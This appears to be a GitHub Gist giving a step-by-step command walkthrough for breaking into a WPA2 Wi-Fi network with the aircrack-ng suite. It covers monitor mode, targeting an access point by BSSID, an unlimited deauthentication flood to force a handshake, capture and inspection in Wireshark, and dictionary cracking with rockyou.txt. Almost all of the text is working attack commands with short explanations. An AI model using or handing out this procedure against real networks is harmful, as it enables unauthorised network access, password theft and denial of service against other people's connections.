Created
September 16, 2023 15:25
-
-
Save theriturajps/1aa0f8240ab65a7e25c3272be097c56a to your computer and use it in GitHub Desktop.
Use airmon-ng to hack Wi-Fi network
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cat /etc/os-release or uname -a | |
| ip addr | |
| iwconfig >>>>> to see wifi adapter is in Mode:Monitor or in Mode:Managed | |
| sudo airmon-ng check kill >>>>> to kill coflicting process | |
| sudo airmon-ng start wlan0 >>>>> convert wifi adapter Mode:Managed to Mode:Monitor | |
| sudo airmon-ng >>>>> also use this to conform it's wlan0mon | |
| sudo airodump-ng wlan0mon >>>>> discover the access point of the wifi router note the BSSID and CH of the interested wifi router you want to attack | |
| ----------------------------------------------------------------------------------------------------------------- | |
| BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID | | |
| | | |
| 5E:34:7B:83:41:64 -23 34 0 0 1 65 WPA2 CCMP PSK Ritu Raj Pratap Singh | | |
| ----------------------------------------------------------------------------------------------------------------- | |
| sudo airodump-ng wlan0mon -d 5E:34:7B:83:41:64 >>>>> to display only that access point. | |
| sudo airodump-ng -w rituwifi -c 1 --bssid 5E:34:7B:83:41:64 wlan0mon >>>>> this (rituwifi) is the file where we saving the captures cap file to open with wireshark in file called rituwifi, (-c 1) is the channel we are attacking (--bssid 5E:34:7B:83:41:64) for the access point of router and interface we are using (wlan0mon). | |
| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | |
| in seccond window | |
| ----------------- | |
| sudo aireplay-ng --deauth 0 -a 5E:34:7B:83:41:64 wlan0mon >>>>> to deauthinticate the client from the network, (0) means we are not gonna stop the number of deauthintacation use against that access point. | |
| >> when using this command you try to connect to that router using mobile "AE:28:EE:1C:9B:A0" after while on 1st window the WPA handshake: 5E:34:7B:83:41:64 will be captured on top right side. | |
| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | |
| ls >>>> you can see the rituwifi-01.cap file is captured. | |
| wireshark rituwifi-01.cap >>>>> to open the "rituwifi-01.cap" file, in opened wireshark window you will she whole bunch of information has been captured there search for the handshake using search in wireshark type there "eapol" there will be many you have to find that Source "AE:28:EE:1C:9B:A0" & Destination "5E:34:7B:83:41:64" if possible sort it and open then go see the ( WPA Key Data: 301a0100000fac040100000fac040100000fac0280000000000fac06 ) was sent from phone to the router. | |
| sudo airmon-ng stop wlan0mon >>>>> now stop the monitor mode. | |
| aircrack-ng rituwifi-01.cap -w /usr/share/wordlists/rockyou.txt >>>> to crack the password from the cap file using the rockyou disctionary. [ if the rockyou.txt.gz is not unzip you can use "sudo gzip -d rockyou.txt.gz" ] | |
| NOTE | |
| ------ | |
| if in kali when you try to connect wifi then it show "NetworkManager is not running" so for this use - | |
| $ service NetworkManager restart | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment